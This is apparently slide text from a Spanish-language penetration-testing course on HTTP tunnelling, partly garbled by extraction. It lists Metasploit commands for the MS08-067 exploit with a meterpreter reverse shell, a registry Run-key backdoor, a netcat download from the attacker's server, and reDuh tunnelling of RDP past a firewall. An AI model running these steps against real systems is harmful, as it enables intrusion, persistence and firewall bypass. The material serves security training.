CAPITULO 4, SESIN 10
HTTP TUNELLING
HACKER
NO ETICO
PROXY
IN
CO
RR
ATAQUE
ATAQUE
OXY
CON EXIN AL PR
E CT
O
VICTIMA
Preparativos
Diagramar ejercicio
Instalar backdoor en vctima
Configurar proxy
Acceder al ataque
exploit/windows/smb/ms08_067_netapi
set LHOST IP_BACK_TRACK
set RHOST IP_VICTIMA
set PAYLOAD
windows/meterpreter/reverse_tcp
exploit
automtica.
En meterpreter escriba shell
shell
hklm\software\microsoft\windows\currentversion\run /
v cmd /t reg_sz /d c:\windows\system32\ps4.exe
Atacar II
Desde su Windows XP HOST descarguese el
/var/www
/etc/init.d.apache2 start
En Windows abra el navegador y escriba
http://IPDELBACKTRACK/nc.exe
Guardelo en C:
Configurar el PROXY
Luego aplique:
Atacar II
Vaya a la consola de Windows XP HOST
vaya al C:
escriba:
nc.exe nvv PROXY 8888
Ejemplo
nc 192.168.9.175 8888
Escriba ahora:
CONNECT IPVICTIMA:3030 HTTP/1.0
FIR
LL
A
W
www.victima.com
TCP/80
ABIERTO
CENTOS
qquuee
A
Attaa
DMZ
VICTIMA XP
TCP/3389
ABIERTO
ATACANTE
BACKTRACK
WINDOWS XP HOST
LAN
re-Duh
Crea un circuito HTTP entre una victima y el
atacante.
Pasa firewalls DMZ y llega hasta la LAN
Consiste en dos partes, una cliente y una
servidor.
El servidor es un script en .jsp o .php o .aspx
PC del atacante.
Por medio de un puerto local el atacante conecta
reDuh.php
En el backTrack ir a la carpeta:
cd /pentest/COMBAT/reDuhClient
http://IPSERVIDORWEB/reDuh.php
el tunel
>>[createTunnel]1234:IPVICTIMALAN:338
9
Una vez echo esto se crea el tunnel y ya
1234, as:
Desconectar el Tunnel
EN la consola del reDuh en BackTrack
ponemos:
>>[killReDuh]
Enlaces
http://www.sensepost.com/labs/tools/pent
est/reduh